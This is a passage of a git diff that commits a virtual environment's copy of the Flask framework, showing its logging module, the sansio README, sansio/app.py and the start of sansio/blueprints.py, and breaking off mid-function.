+1,76 @@ +from __future__ import annotations + +import logging +import sys +import typing as t + +from werkzeug.local import LocalProxy + +from .globals import request + +if t.TYPE_CHECKING: # pragma: no cover + from .sansio.app import App + + +@LocalProxy +def wsgi_errors_stream() -> t.TextIO: + """Find the most appropriate error stream for the application. If a request + is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``. + + If you configure your own :class:`logging.StreamHandler`, you may want to + use this for the stream. If you are using file or dict configuration and + can't import this directly, you can refer to it as + ``ext://flask.logging.wsgi_errors_stream``. + """ + return request.environ["wsgi.errors"] if request else sys.stderr + + +def has_level_handler(logger: logging.Logger) -> bool: + """Check if there is a handler in the logging chain that will handle the + given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`. + """ + level = logger.getEffectiveLevel() + current = logger + + while current: + if any(handler.level <= level for handler in current.handlers): + return True + + if not current.propagate: + break + + current = current.parent # type: ignore + + return False + + +#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format +#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``. +default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore +default_handler.setFormatter( + logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s") +) + + +def create_logger(app: App) -> logging.Logger: + """Get the Flask app's logger and configure it if needed. + + The logger name will be the same as + :attr:`app.import_name `. + + When :attr:`~flask.Flask.debug` is enabled, set the logger level to + :data:`logging.DEBUG` if it is not set. + + If there is no handler for the logger's effective level, add a + :class:`~logging.StreamHandler` for + :func:`~flask.logging.wsgi_errors_stream` with a basic format. + """ + logger = logging.getLogger(app.name) + + if app.debug and not logger.level: + logger.setLevel(logging.DEBUG) + + if not has_level_handler(logger): + logger.addHandler(default_handler) + + return logger diff --git a/env/Lib/site-packages/flask/py.typed b/env/Lib/site-packages/flask/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/flask/sansio/README.md b/env/Lib/site-packages/flask/sansio/README.md new file mode 100644 index 00000000..623ac198 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/README.md @@ -0,0 +1,6 @@ +# Sansio + +This folder contains code that can be used by alternative Flask +implementations, for example Quart. The code therefore cannot do any +IO, nor be part of a likely IO path. Finally this code cannot use the +Flask globals. diff --git a/env/Lib/site-packages/flask/sansio/app.py b/env/Lib/site-packages/flask/sansio/app.py new file mode 100644 index 00000000..0f7d2cbf --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/app.py @@ -0,0 +1,964 @@ +from __future__ import annotations + +import logging +import os +import sys +import typing as t +from datetime import timedelta +from itertools import chain + +from werkzeug.exceptions import Aborter +from werkzeug.exceptions import BadRequest +from werkzeug.exceptions import BadRequestKeyError +from werkzeug.routing import BuildError +from werkzeug.routing import Map +from werkzeug.routing import Rule +from werkzeug.sansio.response import Response +from werkzeug.utils import cached_property +from werkzeug.utils import redirect as _wz_redirect + +from .. import typing as ft +from ..config import Config +from ..config import ConfigAttribute +from ..ctx import _AppCtxGlobals +from ..helpers import _split_blueprint_path +from ..helpers import get_debug_flag +from ..json.provider import DefaultJSONProvider +from ..json.provider import JSONProvider +from ..logging import create_logger +from ..templating import DispatchingJinjaLoader +from ..templating import Environment +from .scaffold import _endpoint_from_view_func +from .scaffold import find_package +from .scaffold import Scaffold +from .scaffold import setupmethod + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.wrappers import Response as BaseResponse + from .blueprints import Blueprint + from ..testing import FlaskClient + from ..testing import FlaskCliRunner + +T_shell_context_processor = t.TypeVar( + "T_shell_context_processor", bound=ft.ShellContextProcessorCallable +) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) + + +def _make_timedelta(value: timedelta | int | None) -> timedelta | None: + if value is None or isinstance(value, timedelta): + return value + + return timedelta(seconds=value) + + +class App(Scaffold): + """The flask object implements a WSGI application and acts as the central + object. It is passed the name of the module or package of the + application. Once it is created it will act as a central registry for + the view functions, the URL rules, template configuration and much more. + + The name of the package is used to resolve resources from inside the + package or the folder the module is contained in depending on if the + package parameter resolves to an actual python package (a folder with + an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file). + + For more information about resource loading, see :func:`open_resource`. + + Usually you create a :class:`Flask` instance in your main module or + in the :file:`__init__.py` file of your package like this:: + + from flask import Flask + app = Flask(__name__) + + .. admonition:: About the First Parameter + + The idea of the first parameter is to give Flask an idea of what + belongs to your application. This name is used to find resources + on the filesystem, can be used by extensions to improve debugging + information and a lot more. + + So it's important what you provide there. If you are using a single + module, `__name__` is always the correct value. If you however are + using a package, it's usually recommended to hardcode the name of + your package there. + + For example if your application is defined in :file:`yourapplication/app.py` + you should create it with one of the two versions below:: + + app = Flask('yourapplication') + app = Flask(__name__.split('.')[0]) + + Why is that? The application will work even with `__name__`, thanks + to how resources are looked up. However it will make debugging more + painful. Certain extensions can make assumptions based on the + import name of your application. For example the Flask-SQLAlchemy + extension will look for the code in your application that triggered + an SQL query in debug mode. If the import name is not properly set + up, that debugging information is lost. (For example it would only + pick up SQL queries in `yourapplication.app` and not + `yourapplication.views.frontend`) + + .. versionadded:: 0.7 + The `static_url_path`, `static_folder`, and `template_folder` + parameters were added. + + .. versionadded:: 0.8 + The `instance_path` and `instance_relative_config` parameters were + added. + + .. versionadded:: 0.11 + The `root_path` parameter was added. + + .. versionadded:: 1.0 + The ``host_matching`` and ``static_host`` parameters were added. + + .. versionadded:: 1.0 + The ``subdomain_matching`` parameter was added. Subdomain + matching needs to be enabled manually now. Setting + :data:`SERVER_NAME` does not implicitly enable it. + + :param import_name: the name of the application package + :param static_url_path: can be used to specify a different path for the + static files on the web. Defaults to the name + of the `static_folder` folder. + :param static_folder: The folder with static files that is served at + ``static_url_path``. Relative to the application ``root_path`` + or an absolute path. Defaults to ``'static'``. + :param static_host: the host to use when adding the static route. + Defaults to None. Required when using ``host_matching=True`` + with a ``static_folder`` configured. + :param host_matching: set ``url_map.host_matching`` attribute. + Defaults to False. + :param subdomain_matching: consider the subdomain relative to + :data:`SERVER_NAME` when matching routes. Defaults to False. + :param template_folder: the folder that contains the templates that should + be used by the application. Defaults to + ``'templates'`` folder in the root path of the + application. + :param instance_path: An alternative instance path for the application. + By default the folder ``'instance'`` next to the + package or module is assumed to be the instance + path. + :param instance_relative_config: if set to ``True`` relative filenames + for loading the config are assumed to + be relative to the instance path instead + of the application root. + :param root_path: The path to the root of the application files. + This should only be set manually when it can't be detected + automatically, such as for namespace packages. + """ + + #: The class of the object assigned to :attr:`aborter`, created by + #: :meth:`create_aborter`. That object is called by + #: :func:`flask.abort` to raise HTTP errors, and can be + #: called directly as well. + #: + #: Defaults to :class:`werkzeug.exceptions.Aborter`. + #: + #: .. versionadded:: 2.2 + aborter_class = Aborter + + #: The class that is used for the Jinja environment. + #: + #: .. versionadded:: 0.11 + jinja_environment = Environment + + #: The class that is used for the :data:`~flask.g` instance. + #: + #: Example use cases for a custom class: + #: + #: 1. Store arbitrary attributes on flask.g. + #: 2. Add a property for lazy per-request database connectors. + #: 3. Return None instead of AttributeError on unexpected attributes. + #: 4. Raise exception if an unexpected attr is set, a "controlled" flask.g. + #: + #: In Flask 0.9 this property was called `request_globals_class` but it + #: was changed in 0.10 to :attr:`app_ctx_globals_class` because the + #: flask.g object is now application context scoped. + #: + #: .. versionadded:: 0.10 + app_ctx_globals_class = _AppCtxGlobals + + #: The class that is used for the ``config`` attribute of this app. + #: Defaults to :class:`~flask.Config`. + #: + #: Example use cases for a custom class: + #: + #: 1. Default values for certain config options. + #: 2. Access to config values through attributes in addition to keys. + #: + #: .. versionadded:: 0.11 + config_class = Config + + #: The testing flag. Set this to ``True`` to enable the test mode of + #: Flask extensions (and in the future probably also Flask itself). + #: For example this might activate test helpers that have an + #: additional runtime cost which should not be enabled by default. + #: + #: If this is enabled and PROPAGATE_EXCEPTIONS is not changed from the + #: default it's implicitly enabled. + #: + #: This attribute can also be configured from the config with the + #: ``TESTING`` configuration key. Defaults to ``False``. + testing = ConfigAttribute("TESTING") + + #: If a secret key is set, cryptographic components can use this to + #: sign cookies and other things. Set this to a complex random value + #: when you want to use the secure cookie for instance. + #: + #: This attribute can also be configured from the config with the + #: :data:`SECRET_KEY` configuration key. Defaults to ``None``. + secret_key = ConfigAttribute("SECRET_KEY") + + #: A :class:`~datetime.timedelta` which is used to set the expiration + #: date of a permanent session. The default is 31 days which makes a + #: permanent session survive for roughly one month. + #: + #: This attribute can also be configured from the config with the + #: ``PERMANENT_SESSION_LIFETIME`` configuration key. Defaults to + #: ``timedelta(days=31)`` + permanent_session_lifetime = ConfigAttribute( + "PERMANENT_SESSION_LIFETIME", get_converter=_make_timedelta + ) + + json_provider_class: type[JSONProvider] = DefaultJSONProvider + """A subclass of :class:`~flask.json.provider.JSONProvider`. An + instance is created and assigned to :attr:`app.json` when creating + the app. + + The default, :class:`~flask.json.provider.DefaultJSONProvider`, uses + Python's built-in :mod:`json` library. A different provider can use + a different JSON library. + + .. versionadded:: 2.2 + """ + + #: Options that are passed to the Jinja environment in + #: :meth:`create_jinja_environment`. Changing these options after + #: the environment is created (accessing :attr:`jinja_env`) will + #: have no effect. + #: + #: .. versionchanged:: 1.1.0 + #: This is a ``dict`` instead of an ``ImmutableDict`` to allow + #: easier configuration. + #: + jinja_options: dict = {} + + #: The rule object to use for URL rules created. This is used by + #: :meth:`add_url_rule`. Defaults to :class:`werkzeug.routing.Rule`. + #: + #: .. versionadded:: 0.7 + url_rule_class = Rule + + #: The map object to use for storing the URL rules and routing + #: configuration parameters. Defaults to :class:`werkzeug.routing.Map`. + #: + #: .. versionadded:: 1.1.0 + url_map_class = Map + + #: The :meth:`test_client` method creates an instance of this test + #: client class. Defaults to :class:`~flask.testing.FlaskClient`. + #: + #: .. versionadded:: 0.7 + test_client_class: type[FlaskClient] | None = None + + #: The :class:`~click.testing.CliRunner` subclass, by default + #: :class:`~flask.testing.FlaskCliRunner` that is used by + #: :meth:`test_cli_runner`. Its ``__init__`` method should take a + #: Flask app object as the first argument. + #: + #: .. versionadded:: 1.0 + test_cli_runner_class: type[FlaskCliRunner] | None = None + + default_config: dict + response_class: type[Response] + + def __init__( + self, + import_name: str, + static_url_path: str | None = None, + static_folder: str | os.PathLike | None = "static", + static_host: str | None = None, + host_matching: bool = False, + subdomain_matching: bool = False, + template_folder: str | os.PathLike | None = "templates", + instance_path: str | None = None, + instance_relative_config: bool = False, + root_path: str | None = None, + ): + super().__init__( + import_name=import_name, + static_folder=static_folder, + static_url_path=static_url_path, + template_folder=template_folder, + root_path=root_path, + ) + + if instance_path is None: + instance_path = self.auto_find_instance_path() + elif not os.path.isabs(instance_path): + raise ValueError( + "If an instance path is provided it must be absolute." + " A relative path was given instead." + ) + + #: Holds the path to the instance folder. + #: + #: .. versionadded:: 0.8 + self.instance_path = instance_path + + #: The configuration dictionary as :class:`Config`. This behaves + #: exactly like a regular dictionary but supports additional methods + #: to load a config from files. + self.config = self.make_config(instance_relative_config) + + #: An instance of :attr:`aborter_class` created by + #: :meth:`make_aborter`. This is called by :func:`flask.abort` + #: to raise HTTP errors, and can be called directly as well. + #: + #: .. versionadded:: 2.2 + #: Moved from ``flask.abort``, which calls this object. + self.aborter = self.make_aborter() + + self.json: JSONProvider = self.json_provider_class(self) + """Provides access to JSON methods. Functions in ``flask.json`` + will call methods on this provider when the application context + is active. Used for handling JSON requests and responses. + + An instance of :attr:`json_provider_class`. Can be customized by + changing that attribute on a subclass, or by assigning to this + attribute afterwards. + + The default, :class:`~flask.json.provider.DefaultJSONProvider`, + uses Python's built-in :mod:`json` library. A different provider + can use a different JSON library. + + .. versionadded:: 2.2 + """ + + #: A list of functions that are called by + #: :meth:`handle_url_build_error` when :meth:`.url_for` raises a + #: :exc:`~werkzeug.routing.BuildError`. Each function is called + #: with ``error``, ``endpoint`` and ``values``. If a function + #: returns ``None`` or raises a ``BuildError``, it is skipped. + #: Otherwise, its return value is returned by ``url_for``. + #: + #: .. versionadded:: 0.9 + self.url_build_error_handlers: list[ + t.Callable[[Exception, str, dict[str, t.Any]], str] + ] = [] + + #: A list of functions that are called when the application context + #: is destroyed. Since the application context is also torn down + #: if the request ends this is the place to store code that disconnects + #: from databases. + #: + #: .. versionadded:: 0.9 + self.teardown_appcontext_funcs: list[ft.TeardownCallable] = [] + + #: A list of shell context processor functions that should be run + #: when a shell context is created. + #: + #: .. versionadded:: 0.11 + self.shell_context_processors: list[ft.ShellContextProcessorCallable] = [] + + #: Maps registered blueprint names to blueprint objects. The + #: dict retains the order the blueprints were registered in. + #: Blueprints can be registered multiple times, this dict does + #: not track how often they were attached. + #: + #: .. versionadded:: 0.7 + self.blueprints: dict[str, Blueprint] = {} + + #: a place where extensions can store application specific state. For + #: example this is where an extension could store database engines and + #: similar things. + #: + #: The key must match the name of the extension module. For example in + #: case of a "Flask-Foo" extension in `flask_foo`, the key would be + #: ``'foo'``. + #: + #: .. versionadded:: 0.7 + self.extensions: dict = {} + + #: The :class:`~werkzeug.routing.Map` for this instance. You can use + #: this to change the routing converters after the class was created + #: but before any routes are connected. Example:: + #: + #: from werkzeug.routing import BaseConverter + #: + #: class ListConverter(BaseConverter): + #: def to_python(self, value): + #: return value.split(',') + #: def to_url(self, values): + #: return ','.join(super(ListConverter, self).to_url(value) + #: for value in values) + #: + #: app = Flask(__name__) + #: app.url_map.converters['list'] = ListConverter + self.url_map = self.url_map_class(host_matching=host_matching) + + self.subdomain_matching = subdomain_matching + + # tracks internally if the application already handled at least one + # request. + self._got_first_request = False + + # Set the name of the Click group in case someone wants to add + # the app's commands to another CLI tool. + self.cli.name = self.name + + def _check_setup_finished(self, f_name: str) -> None: + if self._got_first_request: + raise AssertionError( + f"The setup method '{f_name}' can no longer be called" + " on the application. It has already handled its first" + " request, any changes will not be applied" + " consistently.\n" + "Make sure all imports, decorators, functions, etc." + " needed to set up the application are done before" + " running it." + ) + + @cached_property + def name(self) -> str: # type: ignore + """The name of the application. This is usually the import name + with the difference that it's guessed from the run file if the + import name is main. This name is used as a display name when + Flask needs the name of the application. It can be set and overridden + to change the value. + + .. versionadded:: 0.8 + """ + if self.import_name == "__main__": + fn = getattr(sys.modules["__main__"], "__file__", None) + if fn is None: + return "__main__" + return os.path.splitext(os.path.basename(fn))[0] + return self.import_name + + @cached_property + def logger(self) -> logging.Logger: + """A standard Python :class:`~logging.Logger` for the app, with + the same name as :attr:`name`. + + In debug mode, the logger's :attr:`~logging.Logger.level` will + be set to :data:`~logging.DEBUG`. + + If there are no handlers configured, a default handler will be + added. See :doc:`/logging` for more information. + + .. versionchanged:: 1.1.0 + The logger takes the same name as :attr:`name` rather than + hard-coding ``"flask.app"``. + + .. versionchanged:: 1.0.0 + Behavior was simplified. The logger is always named + ``"flask.app"``. The level is only set during configuration, + it doesn't check ``app.debug`` each time. Only one format is + used, not different ones depending on ``app.debug``. No + handlers are removed, and a handler is only added if no + handlers are already configured. + + .. versionadded:: 0.3 + """ + return create_logger(self) + + @cached_property + def jinja_env(self) -> Environment: + """The Jinja environment used to load templates. + + The environment is created the first time this property is + accessed. Changing :attr:`jinja_options` after that will have no + effect. + """ + return self.create_jinja_environment() + + def create_jinja_environment(self) -> Environment: + raise NotImplementedError() + + def make_config(self, instance_relative: bool = False) -> Config: + """Used to create the config attribute by the Flask constructor. + The `instance_relative` parameter is passed in from the constructor + of Flask (there named `instance_relative_config`) and indicates if + the config should be relative to the instance path or the root path + of the application. + + .. versionadded:: 0.8 + """ + root_path = self.root_path + if instance_relative: + root_path = self.instance_path + defaults = dict(self.default_config) + defaults["DEBUG"] = get_debug_flag() + return self.config_class(root_path, defaults) + + def make_aborter(self) -> Aborter: + """Create the object to assign to :attr:`aborter`. That object + is called by :func:`flask.abort` to raise HTTP errors, and can + be called directly as well. + + By default, this creates an instance of :attr:`aborter_class`, + which defaults to :class:`werkzeug.exceptions.Aborter`. + + .. versionadded:: 2.2 + """ + return self.aborter_class() + + def auto_find_instance_path(self) -> str: + """Tries to locate the instance path if it was not provided to the + constructor of the application class. It will basically calculate + the path to a folder named ``instance`` next to your main file or + the package. + + .. versionadded:: 0.8 + """ + prefix, package_path = find_package(self.import_name) + if prefix is None: + return os.path.join(package_path, "instance") + return os.path.join(prefix, "var", f"{self.name}-instance") + + def create_global_jinja_loader(self) -> DispatchingJinjaLoader: + """Creates the loader for the Jinja2 environment. Can be used to + override just the loader and keeping the rest unchanged. It's + discouraged to override this function. Instead one should override + the :meth:`jinja_loader` function instead. + + The global loader dispatches between the loaders of the application + and the individual blueprints. + + .. versionadded:: 0.7 + """ + return DispatchingJinjaLoader(self) + + def select_jinja_autoescape(self, filename: str) -> bool: + """Returns ``True`` if autoescaping should be active for the given + template name. If no template name is given, returns `True`. + + .. versionchanged:: 2.2 + Autoescaping is now enabled by default for ``.svg`` files. + + .. versionadded:: 0.5 + """ + if filename is None: + return True + return filename.endswith((".html", ".htm", ".xml", ".xhtml", ".svg")) + + @property + def debug(self) -> bool: + """Whether debug mode is enabled. When using ``flask run`` to start the + development server, an interactive debugger will be shown for unhandled + exceptions, and the server will be reloaded when code changes. This maps to the + :data:`DEBUG` config key. It may not behave as expected if set late. + + **Do not enable debug mode when deploying in production.** + + Default: ``False`` + """ + return self.config["DEBUG"] + + @debug.setter + def debug(self, value: bool) -> None: + self.config["DEBUG"] = value + + if self.config["TEMPLATES_AUTO_RELOAD"] is None: + self.jinja_env.auto_reload = value + + @setupmethod + def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: + """Register a :class:`~flask.Blueprint` on the application. Keyword + arguments passed to this method will override the defaults set on the + blueprint. + + Calls the blueprint's :meth:`~flask.Blueprint.register` method after + recording the blueprint in the application's :attr:`blueprints`. + + :param blueprint: The blueprint to register. + :param url_prefix: Blueprint routes will be prefixed with this. + :param subdomain: Blueprint routes will match on this subdomain. + :param url_defaults: Blueprint routes will use these default values for + view arguments. + :param options: Additional keyword arguments are passed to + :class:`~flask.blueprints.BlueprintSetupState`. They can be + accessed in :meth:`~flask.Blueprint.record` callbacks. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + + .. versionadded:: 0.7 + """ + blueprint.register(self, options) + + def iter_blueprints(self) -> t.ValuesView[Blueprint]: + """Iterates over all blueprints by the order they were registered. + + .. versionadded:: 0.11 + """ + return self.blueprints.values() + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + if endpoint is None: + endpoint = _endpoint_from_view_func(view_func) # type: ignore + options["endpoint"] = endpoint + methods = options.pop("methods", None) + + # if the methods are not given and the view_func object knows its + # methods we can use that instead. If neither exists, we go with + # a tuple of only ``GET`` as default. + if methods is None: + methods = getattr(view_func, "methods", None) or ("GET",) + if isinstance(methods, str): + raise TypeError( + "Allowed methods must be a list of strings, for" + ' example: @app.route(..., methods=["POST"])' + ) + methods = {item.upper() for item in methods} + + # Methods that should always be added + required_methods = set(getattr(view_func, "required_methods", ())) + + # starting with Flask 0.8 the view_func object can disable and + # force-enable the automatic options handling. + if provide_automatic_options is None: + provide_automatic_options = getattr( + view_func, "provide_automatic_options", None + ) + + if provide_automatic_options is None: + if "OPTIONS" not in methods: + provide_automatic_options = True + required_methods.add("OPTIONS") + else: + provide_automatic_options = False + + # Add the required methods now. + methods |= required_methods + + rule = self.url_rule_class(rule, methods=methods, **options) + rule.provide_automatic_options = provide_automatic_options # type: ignore + + self.url_map.add(rule) + if view_func is not None: + old_func = self.view_functions.get(endpoint) + if old_func is not None and old_func != view_func: + raise AssertionError( + "View function mapping is overwriting an existing" + f" endpoint function: {endpoint}" + ) + self.view_functions[endpoint] = view_func + + @setupmethod + def template_filter( + self, name: str | None = None + ) -> t.Callable[[T_template_filter], T_template_filter]: + """A decorator that is used to register custom template filter. + You can specify a name for the filter, otherwise the function + name will be used. Example:: + + @app.template_filter() + def reverse(s): + return s[::-1] + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + + def decorator(f: T_template_filter) -> T_template_filter: + self.add_template_filter(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_filter( + self, f: ft.TemplateFilterCallable, name: str | None = None + ) -> None: + """Register a custom template filter. Works exactly like the + :meth:`template_filter` decorator. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + self.jinja_env.filters[name or f.__name__] = f + + @setupmethod + def template_test( + self, name: str | None = None + ) -> t.Callable[[T_template_test], T_template_test]: + """A decorator that is used to register custom template test. + You can specify a name for the test, otherwise the function + name will be used. Example:: + + @app.template_test() + def is_prime(n): + if n == 2: + return True + for i in range(2, int(math.ceil(math.sqrt(n))) + 1): + if n % i == 0: + return False + return True + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def decorator(f: T_template_test) -> T_template_test: + self.add_template_test(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_test( + self, f: ft.TemplateTestCallable, name: str | None = None + ) -> None: + """Register a custom template test. Works exactly like the + :meth:`template_test` decorator. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + self.jinja_env.tests[name or f.__name__] = f + + @setupmethod + def template_global( + self, name: str | None = None + ) -> t.Callable[[T_template_global], T_template_global]: + """A decorator that is used to register a custom template global function. + You can specify a name for the global function, otherwise the function + name will be used. Example:: + + @app.template_global() + def double(n): + return 2 * n + + .. versionadded:: 0.10 + + :param name: the optional name of the global function, otherwise the + function name will be used. + """ + + def decorator(f: T_template_global) -> T_template_global: + self.add_template_global(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_global( + self, f: ft.TemplateGlobalCallable, name: str | None = None + ) -> None: + """Register a custom template global function. Works exactly like the + :meth:`template_global` decorator. + + .. versionadded:: 0.10 + + :param name: the optional name of the global function, otherwise the + function name will be used. + """ + self.jinja_env.globals[name or f.__name__] = f + + @setupmethod + def teardown_appcontext(self, f: T_teardown) -> T_teardown: + """Registers a function to be called when the application + context is popped. The application context is typically popped + after the request context for each request, at the end of CLI + commands, or after a manually pushed context ends. + + .. code-block:: python + + with app.app_context(): + ... + + When the ``with`` block exits (or ``ctx.pop()`` is called), the + teardown functions are called just before the app context is + made inactive. Since a request context typically also manages an + application context it would also be called when you pop a + request context. + + When a teardown function was called because of an unhandled + exception it will be passed an error object. If an + :meth:`errorhandler` is registered, it will handle the exception + and the teardown will not receive it. + + Teardown functions must avoid raising exceptions. If they + execute code that might fail they must surround that code with a + ``try``/``except`` block and log any errors. + + The return values of teardown functions are ignored. + + .. versionadded:: 0.9 + """ + self.teardown_appcontext_funcs.append(f) + return f + + @setupmethod + def shell_context_processor( + self, f: T_shell_context_processor + ) -> T_shell_context_processor: + """Registers a shell context processor function. + + .. versionadded:: 0.11 + """ + self.shell_context_processors.append(f) + return f + + def _find_error_handler( + self, e: Exception, blueprints: list[str] + ) -> ft.ErrorHandlerCallable | None: + """Return a registered error handler for an exception in this order: + blueprint handler for a specific code, app handler for a specific code, + blueprint handler for an exception class, app handler for an exception + class, or ``None`` if a suitable handler is not found. + """ + exc_class, code = self._get_exc_class_and_code(type(e)) + names = (*blueprints, None) + + for c in (code, None) if code is not None else (None,): + for name in names: + handler_map = self.error_handler_spec[name][c] + + if not handler_map: + continue + + for cls in exc_class.__mro__: + handler = handler_map.get(cls) + + if handler is not None: + return handler + return None + + def trap_http_exception(self, e: Exception) -> bool: + """Checks if an HTTP exception should be trapped or not. By default + this will return ``False`` for all exceptions except for a bad request + key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It + also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``. + + This is called for all HTTP exceptions raised by a view function. + If it returns ``True`` for any exception the error handler for this + exception is not called and it shows up as regular exception in the + traceback. This is helpful for debugging implicitly raised HTTP + exceptions. + + .. versionchanged:: 1.0 + Bad request errors are not trapped by default in debug mode. + + .. versionadded:: 0.8 + """ + if self.config["TRAP_HTTP_EXCEPTIONS"]: + return True + + trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"] + + # if unset, trap key errors in debug mode + if ( + trap_bad_request is None + and self.debug + and isinstance(e, BadRequestKeyError) + ): + return True + + if trap_bad_request: + return isinstance(e, BadRequest) + + return False + + def should_ignore_error(self, error: BaseException | None) -> bool: + """This is called to figure out if an error should be ignored + or not as far as the teardown system is concerned. If this + function returns ``True`` then the teardown handlers will not be + passed the error. + + .. versionadded:: 0.10 + """ + return False + + def redirect(self, location: str, code: int = 302) -> BaseResponse: + """Create a redirect response object. + + This is called by :func:`flask.redirect`, and can be called + directly as well. + + :param location: The URL to redirect to. + :param code: The status code for the redirect. + + .. versionadded:: 2.2 + Moved from ``flask.redirect``, which calls this method. + """ + return _wz_redirect( + location, code=code, Response=self.response_class # type: ignore[arg-type] + ) + + def inject_url_defaults(self, endpoint: str, values: dict) -> None: + """Injects the URL defaults for the given endpoint directly into + the values dictionary passed. This is used internally and + automatically called on URL building. + + .. versionadded:: 0.7 + """ + names: t.Iterable[str | None] = (None,) + + # url_for may be called outside a request context, parse the + # passed endpoint instead of using request.blueprints. + if "." in endpoint: + names = chain( + names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0])) + ) + + for name in names: + if name in self.url_default_functions: + for func in self.url_default_functions[name]: + func(endpoint, values) + + def handle_url_build_error( + self, error: BuildError, endpoint: str, values: dict[str, t.Any] + ) -> str: + """Called by :meth:`.url_for` if a + :exc:`~werkzeug.routing.BuildError` was raised. If this returns + a value, it will be returned by ``url_for``, otherwise the error + will be re-raised. + + Each function in :attr:`url_build_error_handlers` is called with + ``error``, ``endpoint`` and ``values``. If a function returns + ``None`` or raises a ``BuildError``, it is skipped. Otherwise, + its return value is returned by ``url_for``. + + :param error: The active ``BuildError`` being handled. + :param endpoint: The endpoint being built. + :param values: The keyword arguments passed to ``url_for``. + """ + for handler in self.url_build_error_handlers: + try: + rv = handler(error, endpoint, values) + except BuildError as e: + # make error available outside except block + error = e + else: + if rv is not None: + return rv + + # Re-raise if called with an active exception, otherwise raise + # the passed in exception. + if error is sys.exc_info()[1]: + raise + + raise error diff --git a/env/Lib/site-packages/flask/sansio/blueprints.py b/env/Lib/site-packages/flask/sansio/blueprints.py new file mode 100644 index 00000000..38c92f45 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/blueprints.py @@ -0,0 +1,626 @@ +from __future__ import annotations + +import os +import typing as t +from collections import defaultdict +from functools import update_wrapper + +from .. import typing as ft +from .scaffold import _endpoint_from_view_func +from .scaffold import _sentinel +from .scaffold import Scaffold +from .scaffold import setupmethod + +if t.TYPE_CHECKING: # pragma: no cover + from .app import App + +DeferredSetupFunction = t.Callable[["BlueprintSetupState"], t.Callable] +T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable) +T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) +T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_context_processor = t.TypeVar( + "T_template_context_processor", bound=ft.TemplateContextProcessorCallable +) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) +T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) +T_url_value_preprocessor = t.TypeVar( + "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable +) + + +class BlueprintSetupState: + """Temporary holder object for registering a blueprint with the + application. An instance of this class is created by the + :meth:`~flask.Blueprint.make_setup_state` method and later passed + to all register callback functions. + """ + + def __init__( + self, + blueprint: Blueprint, + app: App, + options: t.Any, + first_registration: bool, + ) -> None: + #: a reference to the current application + self.app = app + + #: a reference to the blueprint that created this setup state. + self.blueprint = blueprint + + #: a dictionary with all options that were passed to the + #: :meth:`~flask.Flask.register_blueprint` method. + self.options = options + + #: as blueprints can be registered multiple times with the + #: application and not everything wants to be registered + #: multiple times on it, this attribute can be used to figure + #: out if the blueprint was registered in the past already. + self.first_registration = first_registration + + subdomain = self.options.get("subdomain") + if subdomain is None: + subdomain = self.blueprint.subdomain + + #: The subdomain that the blueprint should be active for, ``None`` + #: otherwise. + self.subdomain = subdomain + + url_prefix = self.options.get("url_prefix") + if url_prefix is None: + url_prefix = self.blueprint.url_prefix + #: The prefix that should be used for all URLs defined on the + #: blueprint. + self.url_prefix = url_prefix + + self.name = self.options.get("name", blueprint.name) + self.name_prefix = self.options.get("name_prefix", "") + + #: A dictionary with URL defaults that is added to each and every + #: URL that was defined with the blueprint. + self.url_defaults = dict(self.blueprint.url_values_defaults) + self.url_defaults.update(self.options.get("url_defaults", ())) + + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: t.Callable | None = None, + **options: t.Any, + ) -> None: + """A helper method to register a rule (and optionally a view function) + to the application. The endpoint is automatically prefixed with the + blueprint's name. + """ + if self.url_prefix is not None: + if rule: + rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/"))) + else: + rule = self.url_prefix + options.setdefault("subdomain", self.subdomain) + if endpoint is None: + endpoint = _endpoint_from_view_func(view_func) # type: ignore + defaults = self.url_defaults + if "defaults" in options: + defaults = dict(defaults, **options.pop("defaults")) + + self.app.add_url_rule( + rule, + 